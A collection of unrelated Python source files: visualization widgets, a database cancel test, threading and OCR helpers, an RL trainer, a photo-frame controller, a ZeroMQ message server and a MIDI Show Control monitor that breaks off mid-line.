for vmin, vmax in zip(self.vmins, self.vmaxs)]
plots = [widget(self, grid, vmin=vmin, vmax=vmax, bounding_box=bounding_box, codim=codim)
for vmin, vmax in zip(self.vmins, self.vmaxs)]
if legend:
for i, plot, colorbar, l in zip(range(len(plots)), plots, self.colorbarwidgets, legend):
subplot_layout = QVBoxLayout()
caption = QLabel(l)
caption.setAlignment(Qt.AlignHCenter)
subplot_layout.addWidget(caption)
if not separate_colorbars or backend == 'matplotlib':
subplot_layout.addWidget(plot)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
if colorbar:
hlayout.addWidget(colorbar)
subplot_layout.addLayout(hlayout)
plot_layout.addLayout(subplot_layout, int(i/columns), (i % columns), 1, 1)
else:
for i, plot, colorbar in zip(range(len(plots)), plots, self.colorbarwidgets):
if not separate_colorbars or backend == 'matplotlib':
plot_layout.addWidget(plot, int(i/columns), (i % columns), 1, 1)
else:
hlayout = QHBoxLayout()
hlayout.addWidget(plot)
if colorbar:
hlayout.addWidget(colorbar)
plot_layout.addLayout(hlayout, int(i/columns), (i % columns), 1, 1)
layout.addLayout(plot_layout)
if not separate_colorbars:
layout.addWidget(self.colorbarwidgets[0])
for w in self.colorbarwidgets[1:]:
w.setVisible(False)
self.setLayout(layout)
self.plots = plots
def set(self, U, ind):
if rescale_colorbars:
if separate_colorbars:
self.vmins = tuple(np.min(u[ind]) for u in U)
self.vmaxs = tuple(np.max(u[ind]) for u in U)
else:
self.vmins = (min(np.min(u[ind]) for u in U),) * len(U)
self.vmaxs = (max(np.max(u[ind]) for u in U),) * len(U)
for u, plot, colorbar, vmin, vmax in zip(U, self.plots, self.colorbarwidgets, self.vmins,
self.vmaxs):
plot.set(u[ind], vmin=vmin, vmax=vmax)
if colorbar:
colorbar.set(vmin=vmin, vmax=vmax)
super().__init__(U, PlotWidget(), title=title, length=len(U[0]))
self.grid = grid
self.codim = codim
def save(self):
if not config.HAVE_PYEVTK:
                msg = QMessageBox(QMessageBox.Critical, 'Error', 'VTK output disabled. Please install pyevtk.')
msg.exec_()
return
filename = QFileDialog.getSaveFileName(self, 'Save as vtk file')[0]
base_name = filename.split('.vtu')[0].split('.vtk')[0].split('.pvd')[0]
if base_name:
if len(self.U) == 1:
write_vtk(self.grid, NumpyVectorSpace.make_array(self.U[0]), base_name, codim=self.codim)
else:
for i, u in enumerate(self.U):
write_vtk(self.grid, NumpyVectorSpace.make_array(u), f'{base_name}-{i}',
codim=self.codim)
_launch_qt_app(lambda: MainWindow(grid, U, bounding_box, codim, title=title, legend=legend,
separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=backend),
block)
def visualize_matplotlib_1d(grid, U, codim=1, title=None, legend=None, separate_plots=False, block=False):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_plots
If `True`, use subplots to visualize multiple |VectorArrays|.
block
If `True`, block execution until the plot window is closed.
"""
if not config.HAVE_QT:
raise QtMissing()
if not config.HAVE_MATPLOTLIB:
raise ImportError('cannot visualize: import of matplotlib failed')
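    # Usage sketch, assuming `g` is a one-dimensional grid and `U` vertex data
    # built elsewhere:
    #     visualize_matplotlib_1d(g, U, codim=1, title='solution')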
class MainWindow(PlotMainWindow):
def __init__(self, grid, U, codim, title, legend, separate_plots):
assert isinstance(U, VectorArray) \
or (isinstance(U, tuple)
and all(isinstance(u, VectorArray) for u in U)
and all(len(u) == len(U[0]) for u in U))
U = (U.to_numpy(),) if isinstance(U, VectorArray) else tuple(u.to_numpy() for u in U)
if isinstance(legend, str):
legend = (legend,)
assert legend is None or isinstance(legend, tuple) and len(legend) == len(U)
plot_widget = Matplotlib1DWidget(None, grid, count=len(U), vmin=[np.min(u) for u in U],
vmax=[np.max(u) for u in U], legend=legend, codim=codim,
separate_plots=separate_plots)
super().__init__(U, plot_widget, title=title, length=len(U[0]))
self.grid = grid
_launch_qt_app(lambda: MainWindow(grid, U, codim, title=title, legend=legend, separate_plots=separate_plots), block)
|
test_cancel.py
|
# Copyright (c) 2019-2021 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from ... import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
        # Cursor.cancel() should not be supported anymore
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
exec(CancelTestCase.createPrepStmtClass())
|
02-threading_daemons.py
|
#!/usr/bin/env python3
# By default, threads are spawned as regular (non-daemon) threads, and hence
# the program only fully exits once all such threads exit.
# Threads can be spawned as daemons, which run in the background
# in parallel, without interfering with the main program, while
# providing support to it.
# Examples of such background threads are a spell checker in a
# file editor, or a heartbeat checker in a distributed system.
# To start a thread as a daemon, pass `daemon=True` while creating it
# or set its `daemon` attribute to `True` before calling `start()`.
# By default, the main program flow and other threads don't specifically
# wait for a `daemon` thread to exit before exiting themselves,
# i.e. other threads and the program itself can exit even if the `daemon`
# thread is still running. This won't always be ideal.
# Refer to the next example for `join()` to overcome this.
import threading
import logging
import time
def daemon_thread():
logging.debug("Starting daemon")
time.sleep(5)
logging.debug("Stopping daemon")
def non_daemon():
logging.debug("Starting non-daemon thread")
time.sleep(5)
logging.debug("Exiting non-daemon thread")
logging.basicConfig(
level=logging.DEBUG, format="[%(levelname)s] (%(threadName)-10s) %(message)s"
)
process_1 = threading.Thread(name="Daemon thread", target=daemon_thread, daemon=True)
process_2 = threading.Thread(name="Non-Daemon thread", target=non_daemon)
process_1.start()
process_2.start()
|
ocr.py
|
from abc import ABC, abstractmethod
from typing import List
import threading
class OCR(ABC):
@abstractmethod
def initialize(self):
''' Initialize the OCR '''
pass
@abstractmethod
def ocr_one_image(self, images:List) -> List:
''' OCR an image.
Input: An array of (area, image)s, opened by PIL and pre-processed
Return: An array of (area, message), where the message is from OCR'''
pass
    def ocr(self, images: List) -> List:
        '''Runs ocr_one_image on each image in a separate thread.
        Input: images (list of (area, image) tuples, opened by PIL and pre-processed)
        Returns: a list of (area, message) tuples in the same order as the input.'''
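        # Each worker thread is invoked as
        #     ocr_one_image(area, image, threadList=threadResults, threadNum=n)
        # and is expected to write its message into threadResults[n]; the
        # (area, message) pairs are reassembled in input order below.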
threads = []
threadResults = ["" for i in range(len(images))]
threadNum = 0
results = []
for image in images:
t = threading.Thread(target=self.ocr_one_image, args=(image[0], image[1]), kwargs={'threadList':threadResults, 'threadNum':threadNum})
t.start()
threads.append(t)
threadNum += 1
for t in threads:
t.join()
i = 0
for result in threadResults:
results.append((images[i][0], result))
i += 1
return results
def __init__(self):
self.initialize()
|
run_trainer.py
|
#!/usr/bin/env python
import argparse
import ckpt_util
from multiprocessing import Process, Queue
from concurrent import futures
import json
import grpc
import numpy as np
import models
import model_pb2
import os
import replay_memory as rm
import sys
import tensorflow as tf
import time
import util
np.set_printoptions(precision=5, threshold=10000, suppress=True, linewidth=10000)
# reopen stdout/stderr unbuffered
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
sys.stderr = os.fdopen(sys.stderr.fileno(), 'w', 0)
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--width', type=int, default=160, help="render width")
parser.add_argument('--height', type=int, default=120, help="render height")
parser.add_argument('--batch-size', type=int, default=128, help="training batch size")
parser.add_argument('--batches-per-new-episode', type=int, default=5,
help="number of batches to train per new episode")
parser.add_argument('--event-log-in', type=str, default=None,
help="if set replay these event files into replay memory (comma"
" separated list")
parser.add_argument('--reset-smooth-reward-factor', type=float, default=0.5,
help="use this value to smooth rewards from reset_from_event_logs")
parser.add_argument('--smooth-reward-factor', type=float, default=0.5,
help="use this value to smooth rewards added during training")
parser.add_argument('--event-log-in-num', type=int, default=None,
help="if set only read this many events from event-logs-in")
parser.add_argument('--gpu-mem-fraction', type=float, default=0.3,
help="fraction of gpu mem to allocate")
parser.add_argument('--trainer-port', type=int, default=20045,
help="grpc port to expose for trainer")
rm.add_opts(parser)
ckpt_util.add_opts(parser)
models.add_opts(parser)
util.add_opts(parser)
opts = parser.parse_args()
print >>sys.stderr, "OPTS", opts
class EnqueueServer(model_pb2.ModelServicer):
""" Enqueues calls to new episode."""
def __init__(self, q):
self.q = q
def AddEpisode(self, events, context):
episode = model_pb2.Episode()
episode.event.extend(events)
self.q.put(episode)
return model_pb2.Empty()
def run_enqueue_server(episodes):
grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=3))
model_pb2.add_ModelServicer_to_server(EnqueueServer(episodes), grpc_server)
grpc_server.add_insecure_port("[::]:%d" % opts.trainer_port)
grpc_server.start()
while True:
time.sleep(10)
def run_trainer(episodes, opts):
# init replay memory
render_shape = (opts.height, opts.width, 3)
replay_memory = rm.ReplayMemory(opts=opts,
state_shape=render_shape,
action_dim=2,
load_factor=1.1)
if opts.event_log_in:
replay_memory.reset_from_event_logs(opts.event_log_in,
opts.event_log_in_num,
opts.reset_smooth_reward_factor)
# init network for training
config = tf.ConfigProto()
#config.gpu_options.allow_growth = True
#config.log_device_placement = True
config.gpu_options.per_process_gpu_memory_fraction = opts.gpu_mem_fraction
sess = tf.Session(config=config)
network = models.NafNetwork("naf", action_dim=2, opts=opts)
with sess.as_default():
# setup saver util and either load saved ckpt or init variables
saver = ckpt_util.TrainerCkptSaver(sess, opts.ckpt_dir, opts.ckpt_save_freq)
for v in tf.all_variables():
if '/biases:' not in v.name:
print >>sys.stderr, v.name, util.shape_and_product_of(v)
network.setup_target_network()
# while true process episodes from run_agents
print util.dts(), "waiting for episodes"
while True:
start_time = time.time()
episode = episodes.get()
wait_time = time.time() - start_time
start_time = time.time()
replay_memory.add_episode(episode,
smooth_reward_factor=opts.smooth_reward_factor)
losses = []
if replay_memory.burnt_in():
for _ in xrange(opts.batches_per_new_episode):
batch = replay_memory.batch(opts.batch_size)
batch_losses = network.train(batch).T[0] # .T[0] => (B, 1) -> (B,)
replay_memory.update_priorities(batch.idxs, batch_losses)
network.target_value_net.update_target_weights()
losses.extend(batch_losses)
saver.save_if_required()
process_time = time.time() - start_time
stats = {"wait_time": wait_time,
"process_time": process_time,
"pending": episodes.qsize(),
"replay_memory": replay_memory.stats}
if losses:
stats['loss'] = {"min": float(np.min(losses)),
"median": float(np.median(losses)),
"mean": float(np.mean(losses)),
"max": float(np.max(losses))}
print "STATS\t%s\t%s" % (util.dts(), json.dumps(stats))
if __name__ == '__main__':
queued_episodes = Queue(5)
enqueue_process = Process(target=run_enqueue_server, args=(queued_episodes,))
enqueue_process.daemon = True
enqueue_process.start()
trainer_process = Process(target=run_trainer, args=(queued_episodes, opts))
trainer_process.daemon = True
trainer_process.start()
while True:
time.sleep(10)
|
photo.py
|
#!/usr/bin/env python3
import configparser
import datetime
import http.server
import os
import random
import signal
import socketserver
import sys
from threading import Thread, Timer
import time
import urllib.parse
import requests
import utils
from utils import debug, enc, error, info, runproc, BASE_KEY, CONFIG_FILE
MONITOR_CMD = "echo 'on 0' | /usr/bin/cec-client -s -d 1"
BROWSER_CYCLE = 60
PORT = 9001
def swapext(pth, ext):
"""Replaces the extension for the specified path with the supplied
extension.
"""
ext = ext.lstrip(".")
dirname = os.path.dirname(pth)
basename = os.path.basename(pth)
newname = "%s.%s" % (os.path.splitext(basename)[0], ext)
return os.path.join(dirname, newname)
def fb_path(pth):
    """Given a path to an image file, returns the corresponding path in the
    frame buffer directory with the same name but with the '.fb' extension.
"""
img_name = os.path.basename(pth)
fb_name = swapext(img_name, "fb")
return os.path.join(FB_PHOTODIR, fb_name)
def clean_fb(pth):
"""Deletes the frame buffer version of an image if it exists"""
fb = fb_path(pth)
if os.path.exists(fb):
os.unlink(fb)
def get_freespace():
stat = os.statvfs(".")
freespace = stat.f_frsize * stat.f_bavail
debug("Free disk space =", freespace)
return freespace
def run_webserver(mgr):
with socketserver.TCPServer(("", PORT), PhotoHandler) as httpd:
httpd.mgr = mgr
info("Webserver running on port", PORT)
httpd.serve_forever()
class PhotoHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/status":
mgr = self.server.mgr
url = mgr.get_url()
start = time.time()
while not url:
if (time.time() - start) > BROWSER_CYCLE:
url = mgr.get_last_url()
break
time.sleep(1)
url = mgr.get_url()
mgr.clear_url()
self.send_response(200)
self.end_headers()
debug("Writing photo URL to browser")
self.wfile.write(enc(url))
else:
with open("main.html") as ff:
html = ff.read()
debug("Writing HTML to browser")
self.send_response(200)
self.end_headers()
self.wfile.write(enc(html))
class ImageManager(object):
def __init__(self):
self._started = False
self._in_read_config = False
self.photo_timer = None
self.timer_start = None
self.photo_url = ""
self.last_url = ""
self._read_config()
self.initial_interval = self._set_start()
self._set_power_on()
self.in_check_host = False
self.image_list = []
self.displayed_name = ""
self.image_index = 0
self._register()
self.start_server()
def start(self):
# self.check_webbrowser()
self._set_signals()
self.set_timer()
self._started = True
self.show_photo()
self.main_loop()
def main_loop(self):
"""Listen for changes on the key for this host."""
debug("Entering main loop; watching", self.watch_key)
# Sometimes the first connection can be very slow - around 2 minutes!
power_key = "{}power_state".format(self.watch_key)
debug("Power key:", power_key)
power_state = utils.read_key(power_key)
debug("Power State:", power_state)
self._set_power_state(power_state)
callback = self.process_event
utils.watch(self.watch_key, callback)
# Shouldn't reach here.
sys.exit(0)
def start_server(self):
t = Thread(target=run_webserver, args=(self,))
t.start()
debug("Webserver started")
def _set_power_on(self):
# Power on the monitor and HDMI output
debug("Powering on the monitor")
out, err = runproc(MONITOR_CMD)
debug("Power result", out.strip(), err.strip())
def _set_start(self):
now = datetime.datetime.now()
base_hour, base_minute = self.interval_base.split(":")
start_hour = now.hour if base_hour == "*" else int(base_hour)
if base_minute == "*":
start_minute = now.minute
else:
if start_hour == now.hour:
# We want to make up the offset from the current time and the
# start hour. First, determine how many minutes until we hit
# the start_minute.
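                # Worked example: with interval_base "*:15", a 10-minute interval
                # and now = 12:07, diff = 15 - 7 = 8 and
                # start_minute = 7 + (8 % 10) = 15, i.e. the first change is at 12:15.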
diff = int(base_minute) - now.minute
if diff < 0:
diff += 60
interval_minutes = int(self.interval / 60)
start_minute = now.minute + (diff % interval_minutes)
else:
                start_minute = int(base_minute)
start_hour = start_hour if start_minute >= now.minute else start_hour + 1
start_day = now.day if start_hour >= now.hour else now.day + 1
if start_minute >= 60:
start_minute = start_minute % 60
start_hour += 1
if start_hour >= 24:
start_hour = start_hour % 24
start_day += 1
start = now.replace(
day=start_day, hour=start_hour, minute=start_minute, second=0, microsecond=0
)
offset = start - now
offset_secs = offset.total_seconds()
return offset_secs if offset_secs > 0 else 0
def set_timer(self, start=True):
diff = self.interval * (self.variance_pct / 100)
interval = round(random.uniform(self.interval - diff, self.interval + diff))
if self.photo_timer:
self.photo_timer.cancel()
self.photo_timer = Timer(interval, self.on_timer_expired)
debug("Timer {} created with interval {}".format(id(self.photo_timer), interval))
next_change = datetime.datetime.now() + datetime.timedelta(seconds=interval)
info("Next photo change scheduled for {}".format(next_change.strftime("%H:%M:%S")))
if start:
self.photo_timer.start()
self.timer_start = time.time()
info("Timer started")
def on_timer_expired(self):
info("Timer Expired")
self._register(heartbeat=True)
self.check_webserver()
self.navigate()
def _set_signals(self):
signal.signal(signal.SIGHUP, self._read_config)
signal.signal(signal.SIGTSTP, self.pause)
signal.signal(signal.SIGCONT, self.resume)
signal.signal(signal.SIGTRAP, self.navigate)
@staticmethod
def _set_power_state(val):
if val and val.lower() in ("stop", "off"):
sys.exit()
def _change_photo(self, val):
# I want to default to forward unless there is a specific request to
# move backwards.
forward = val[:4] != "back"
self.navigate(forward=forward)
def _set_settings(self, val):
"""The parameter 'val' will be a dict in the format of:
setting name: setting value
"""
self._update_config(val)
def _set_images(self, val):
self.image_list = val
self.navigate()
def process_event(self, key, val):
debug("process_event called; clearing heartbeat flag")
utils.clear_heartbeat_flag()
actions = {
"power_state": self._set_power_state,
"change_photo": self._change_photo,
"settings": self._set_settings,
"images": self._set_images,
}
info("Received key: {key} and val: {val}".format(key=key, val=val))
mthd = actions.get(key)
if not mthd:
error("Unknown action received:", key, val)
return
mthd(val)
def pause(self, signum=None, frame=None):
self.photo_timer.cancel()
info("Photo timer stopped")
def resume(self, signum=None, frame=None):
self.set_timer()
info("Photo timer started")
def _read_config(self, signum=None, frame=None):
if self._in_read_config:
# Another process already called this
return
self._in_read_config = True
info("_read_config called!")
parser = utils.parse_config_file()
self.pkid = utils.safe_get(parser, "frame", "pkid")
self.watch_key = BASE_KEY.format(pkid=self.pkid)
settings_key = "{}settings".format(self.watch_key)
settings = utils.read_key(settings_key)
if settings:
self.log_level = settings.get("log_level", "INFO")
self.name = settings.get("name", "undefined")
self.description = settings.get("description", "")
self.orientation = settings.get("orientation", "H")
# When to start the image rotation
self.interval_base = settings.get("interval_base", "*:*")
# How often to change image
self.interval_time = int(settings.get("interval_time", 10))
# Units of time for the image change interval
self.interval_units = settings.get("interval_units", "minutes")
# Percentage to vary the display time from photo to photo
self.variance_pct = int(settings.get("variance_pct", 0))
self.brightness = settings.get("brightness", 1.0)
self.contrast = settings.get("contrast", 1.0)
self.saturation = settings.get("saturation", 1.0)
else:
self.log_level = "INFO"
self.name = "undefined"
self.description = ""
self.orientation = "H"
# When to start the image rotation
self.interval_base = "*:*"
# How often to change image
self.interval_time = 10
# Units of time for the image change interval
self.interval_units = "minutes"
# Percentage to vary the display time from photo to photo
self.variance_pct = 0
self.brightness = 1.0
self.contrast = 1.0
self.saturation = 1.0
utils.set_log_level(self.log_level)
self.reg_url = utils.safe_get(parser, "host", "reg_url")
if not self.reg_url:
error("No registration URL in photo.cfg; exiting")
sys.exit()
self.dl_url = utils.safe_get(parser, "host", "dl_url")
if not self.dl_url:
error("No download URL configured in photo.cfg; exiting")
sys.exit()
self.interval = utils.normalize_interval(self.interval_time, self.interval_units)
self.set_image_interval()
self._in_read_config = False
def set_image_interval(self):
if not self.photo_timer:
# Starting up
return
self.set_timer()
def _register(self, heartbeat=False):
if heartbeat:
# Set the heartbeat flag
debug("Setting heartbeat file...")
utils.set_heartbeat_flag()
headers = {"user-agent": "photoviewer"}
# Get free disk space
freespace = get_freespace()
data = {
"pkid": self.pkid,
"freespace": freespace,
}
resp = requests.post(self.reg_url, data=data, headers=headers)
if 200 <= resp.status_code <= 299:
# Success!
pkid, images = resp.json()
if pkid != self.pkid:
parser = utils.parse_config_file()
parser.set("frame", "pkid", pkid)
with open(CONFIG_FILE, "w") as ff:
parser.write(ff)
self.image_list = images
random.shuffle(self.image_list)
else:
error(resp.status_code, resp.text)
sys.exit()
@staticmethod
def check_webbrowser():
if not utils.check_browser():
info("Web browser not running; restarting")
utils.start_browser()
def check_webserver(self):
if not utils.check_port(PORT):
info("Webserver port not listening; restarting")
self.start_server()
def navigate(self, signum=None, forward=True, frame=None):
"""Moves to the next image. """
debug("navigate called; current index", self.image_index)
num_images = len(self.image_list)
if not num_images:
# Currently no images specified for this display, so just return.
return
delta = 1 if forward else -1
new_index = self.image_index + delta
# Boundaries
max_index = len(self.image_list) - 1
min_index = 0
if new_index > max_index:
new_index = 0
# Shuffle the images
info("All images shown; shuffling order.")
random.shuffle(self.image_list)
elif new_index < min_index:
new_index = max_index
else:
new_index = max(0, min(max_index, new_index))
debug("image index", self.image_index)
debug("new index", new_index)
if new_index != self.image_index:
self.image_index = new_index
self.show_photo()
elif new_index == 0:
self.show_photo()
self.set_timer()
def show_photo(self):
if not self._started:
return
if not self.image_list:
return
try:
fname = self.image_list[self.image_index]
except IndexError as e:
error("BAD INDEX", e)
if self.image_list:
fname = self.image_list[-1]
else:
# Something's screwy
error("No images!")
return
if fname == self.displayed_name:
return
if self.timer_start:
elapsed = round(time.time() - self.timer_start, 2)
if elapsed:
info("Elapsed time:", utils.human_time(elapsed))
info("Showing photo", fname)
# self.photo_url = self.last_url = urllib.parse.quote_plus(os.path.join(self.dl_url, fname))
self.photo_url = self.last_url = os.path.join(self.dl_url, fname)
def get_url(self):
return self.photo_url
def get_last_url(self):
return self.last_url
def clear_url(self):
self.photo_url = ""
def _update_config(self, data):
changed = False
new_interval = False
parser = utils.parse_config_file()
if "log_level" in data:
self.log_level = data["log_level"]
utils.set_log_level(self.log_level)
for key in (
"name",
"description",
"interval_time",
"interval_units",
"variance_pct",
"brightness",
"contrast",
"saturation",
):
val = data.get(key, None)
debug("key:", key, "; val:", val)
if val is None:
continue
local_val = getattr(self, key)
if local_val != val:
                try:
                    typ = type(local_val)
                    converted = typ(val)
                except Exception:
                    # Conversion failed; skip this setting instead of applying a
                    # stale or undefined value.
                    continue
                setattr(self, key, converted)
monitor_keys = ("brightness", "contrast", "saturation")
section = "monitor" if key in monitor_keys else "frame"
parser.set(section, key, str(val))
changed = True
new_interval = new_interval or "interval" in key
if changed:
with open(CONFIG_FILE, "w") as ff:
parser.write(ff)
if new_interval:
self.interval = utils.normalize_interval(self.interval_time, self.interval_units)
info("Setting timer to", self.interval)
self.set_image_interval()
def kill_timer(self):
"""Kills the photo timer on receiving a Ctrl-C."""
info("Killing timer")
self.photo_timer.cancel()
info("Timer canceled")
if __name__ == "__main__":
with open("photo.pid", "w") as ff:
ff.write("%s" % os.getpid())
img_mgr = ImageManager()
try:
debug("And we're off!")
img_mgr.start()
except KeyboardInterrupt:
img_mgr.kill_timer()
|
message_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Message Server."""
import logging
import zmq
import ast
import os
from threading import Thread
from zeus.common.utils import singleton
from zeus.common import JsonEncoder
__all__ = ["MessageServer"]
logger = logging.getLogger(__name__)
@singleton
class MessageServer(object):
"""Message server."""
def __init__(self):
"""Initialize message server."""
self.handlers = {}
self.min_port = 5000
self.max_port = 7000
self.port = None
self.register_handler("query_task_info", query_task_info)
def run(self, ip="*"):
"""Run message server."""
if self.port is not None:
return
try:
context = zmq.Context()
socket = context.socket(zmq.REP)
self.port = socket.bind_to_random_port(
f"tcp://{ip}", min_port=self.min_port, max_port=self.max_port, max_tries=100)
logging.debug("Start message monitor thread.")
monitor_thread = Thread(target=_monitor_socket, args=(socket, self.handlers))
monitor_thread.daemon = True
monitor_thread.start()
return self.port
except Exception as e:
logging.error("Failed to run message monitor thread.")
raise e
    def register_handler(self, action, function):
        """Register message handler."""
self.handlers[action] = function
def _monitor_socket(socket, handlers):
while True:
message = socket.recv_json()
        logger.debug(f"Message arrived: {message}")
if "action" not in message:
socket.send_json({"result": "failed", "message": "Invalid request."}, cls=JsonEncoder)
continue
action = message.get("action")
if action not in handlers:
socket.send_json({"result": "failed", "message": f"Invalid action {action}."}, cls=JsonEncoder)
continue
data = message.get("data", None)
if isinstance(data, str):
try:
data = ast.literal_eval(data)
except Exception as e:
socket.send_json({"result": "failed", "message": f"{e}"}, cls=JsonEncoder)
continue
try:
if isinstance(data, dict):
result = handlers[action](**data)
elif "data" in message:
result = handlers[action](data)
else:
result = handlers[action]()
socket.send_json(result, cls=JsonEncoder)
except Exception as e:
socket.send_json({"result": "failed", "message": f"{e}"}, cls=JsonEncoder)
def query_task_info():
"""Get task message."""
from zeus.common.task_ops import TaskOps
return {
"result": "success",
"task_id": TaskOps().task_id,
"base_path": os.path.abspath(TaskOps().task_cfg.local_base_path),
}
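# Usage sketch: a client could query this server over a plain zmq REQ socket
# (assuming it can reach the bound port), e.g.
#     import zmq
#     port = MessageServer().run()
#     sock = zmq.Context().socket(zmq.REQ)
#     sock.connect(f"tcp://127.0.0.1:{port}")
#     sock.send_json({"action": "query_task_info"})
#     reply = sock.recv_json()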
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""MSC Monitor"""
__author__ = "Justin Stasiw"
__version__ = "$Revision 0.1b$"
__date__ = "$Date: 2021/08/05"
import mido
import mido.backends.rtmidi
from datetime import datetime
from threading import Thread
from pubsub import pub
import multiprocessing
from multiprocessing import Process, Queue
import wx
import sys
def GetMidiInputNames(queue):
names = mido.get_input_names()
queue.put(names)
class MSCPrintout(Thread):
def __init__(self):
        Thread.__init__(self)
self.MidiIn = None
mido.set_backend('mido.backends.rtmidi')
self.Command_Formats = {
0: "Reserved",
1: "Lighting",
2: "Moving Lights",
3: "Colour Changers",
4: "Strobes",
5: "Lasers",
6: "Chasers",
16: "Sound",
17: "Music",
18: "CD Players",
19: "EEPROM Playback",
20: "Audio Tape Machines",
21: "Intercoms",
22: "Amplifiers",
23: "Audio Effects Devices",
24: "Equalisers",
32: "Machinery",
33: "Rigging",
34: "Flys",
35: "Lifts",
36: "Turntables",
37: "Trusses",
38: "Robots",
39: "Animation",
40: "Floats",
41: "Breakaways",
42: "Barges",
48: "Video",
49: "Video Tape Machines",
50: "Video Cassette Machines",
51: "Video Disc Players",
52: "Video Switchers",
53: "Video Effects:",
54: "Video Character Generators",
55: "Video Still Stores",
56: "Video Monitors",
64: "Projection",
65: "Film Projectors",
66: "Slide Projectors",
67: "Video Projectors",
68: "Dissolvers",
69: "Shutter Controls",
80: "Process Control",
81: "Hydraulic Oil",
82: "H2O",
83: "CO2",
84: "Compressed Air",
85: "Natural Gas",
86: "Fog",
87: "Smoke",
88: "Cracked Haze",
96: "Pyro",
97: "Fireworks",
98: "Explosions",
99: "Flame",
100: "Smoke Pots",
127: "All-Types"
}
self.Command_Types = {
0: "Reserved",
1: "GO",
2: "STOP",
3: "RESUME",
4: "TIMED_GO",
5: "LOAD",
6: "SET",
7: "FIRE",
8: "ALL_OFF",
9: "RESTORE",
10: "RESET",
11: "GO_OFF",
16: "GO/JAM CLOCK",
17: "STANDBY_+",
18: "STANDBY_-",
19: "SEQUENCE_+",
20: "SEQUENCE_-",
21: "START_CLOCK",
22: "STOP_CLOCK",
23: "ZERO_CLOCK",
24: "SET_CLOCK",
25: "MTC_CHASE_ON",
26: "MTC_CHASE_OFF",
27: "OPEN_CUE_LIST",
28: "CLOSE_CUE_LIST",
29: "OPEN_CUE_PATH",
30: "CLOSE_CUE_PATH"
        }
        # Start the listener thread only after all attributes above are
        # initialized, so run() never sees a partially constructed object.
        self.start()
def run(self):
self.AvailableMidiPorts()
pub.subscribe(self.AvailableMidiPorts, 'refreshInterfaces')
def AvailableMidiPorts(self):
queue = Queue()
p = Process(target=GetMidiInputNames, args=(queue,))
p.start()
p.join()
AvailablePorts = queue.get()
AvailablePorts = list(dict.fromkeys(AvailablePorts))
pub.sendMessage('availablePorts', choices=AvailablePorts)
pub.subscribe(self.OpenMidiPort, "chosenPort")
    def OpenMidiPort(self, port_to_open):
        # Opens the MIDI input port and starts a thread for MIDI receive.
        if self.MidiIn is not None:
            self.MidiIn.close()
        try:
            self.MidiIn = mido.open_input(port_to_open)
        except Exception:
            print("Failed to open midi port")
            return
        # Start a receive thread for the newly opened port; the previous
        # thread (if any) ends once its port is closed above.
        midi_receive_thread = Thread(target=self.MidiReceiveHandler, daemon=True)
        midi_receive_thread.start()
def MidiReceiveHandler(self):
# Passes off incoming midi from controller to the relevant Defs
if self.MidiIn != None:
for msg in self.MidiIn:
if msg.type == "sysex":
wx.CallAfter(self.MSCTranslator, msg)
del msg
def MSCTranslator(self, msg):
incoming_sysex = msg.data
# Check for MSC:
if incoming_sysex[0] == 127 and incoming_sysex[2] == 2:
Device_ID = str(incoming_sysex[1])
Command_Format = incoming_sysex[3]
if incoming_sysex[3] in self.Command_Formats:
Command_Format = self.Command_Formats[incoming_sysex[3]]
else:
Command_Format = "Invalid"
if incoming_sysex[4] in self.Command_Types:
Command_Type = self.Command_Types[incoming_sysex[4]]
else:
Command_Type = "Invalid"
remaining_data = incoming_sysex[5:]
size = len(remaining_data)
# List Comprehension magic that I don't really understand:
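            # What it does: idx_list holds the positions just past every 0x00
            # delimiter in the remaining sysex data, and res slices the data into
            # the chunks between those delimiters (cue number, cue list, cue path).
            # The trailing 0 of each chunk is stripped in the loop below.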
try:
idx_list = [idx + 1 for idx, val in enumerate(remaining_data) if val == 0]
res = [remaining_data[i:j] for i, j in
